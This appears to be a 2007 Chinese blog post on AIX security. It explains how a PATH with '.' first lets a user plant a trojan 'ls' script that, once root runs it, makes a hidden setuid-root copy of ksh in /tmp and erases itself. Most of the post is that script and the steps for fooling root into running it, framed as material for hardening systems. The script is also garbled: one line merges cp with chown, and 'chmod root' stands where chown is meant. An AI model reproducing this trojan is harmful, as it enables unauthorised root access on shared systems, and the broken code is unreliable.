2007年5月25日星期五

骗取root的使用权

最近上课介绍AIX的安全性,竟然先听到一个如何骗取root帐号的方法,觉得有趣,写出来同大家一起研究,以便加强系统的安全性,当然仁者见仁,智者见智....
这个方法的前提条件是系统路径设置有问题:
一般情况下
PATH=/usr/bin:/etc:/usr/sbin:/sbin:.
而若是设置为
PATH=.:/usr/bin:/etc:/usr/sbin:/sbin
则非常不安全,这是因为此时输入命令系统会首先查找当前目录然后再查询其他目录,这就给黑客创建了很危险的机会:用自己编写同系统命令相同名称脚本来迷惑root用户。

$ cd /home/hacker                     
$ vi ls #创建ls文件
#!/usr/bin/ksh
cp /usr/bin/ksh /tmp/.hackerchown #拷贝ksh以便以后使用
chmod root /tmp/.hacker #赋予拷贝后的文件root权限
chmod u+s /tmp/.hacker #使拷贝后的文件运行是以文件所属(root)权限运行
rm -f $0 #强制删除此假ls文件
/usr/bin/ls $* #将输入的参数传入的系统ls命令。

$ chmod a+x ls #赋予此ls文件可运行的属性
然后就是看你怎么欺骗root用户在当前目录下运行此文件了。
若是root用户在你的当前目录下运行了ls命令,那么当你运行/tmp/.hacker命令就可以重启一个ksh,而这个ksh则是拥有root权限的shell了,至此你想做什么都可以了....

没有评论: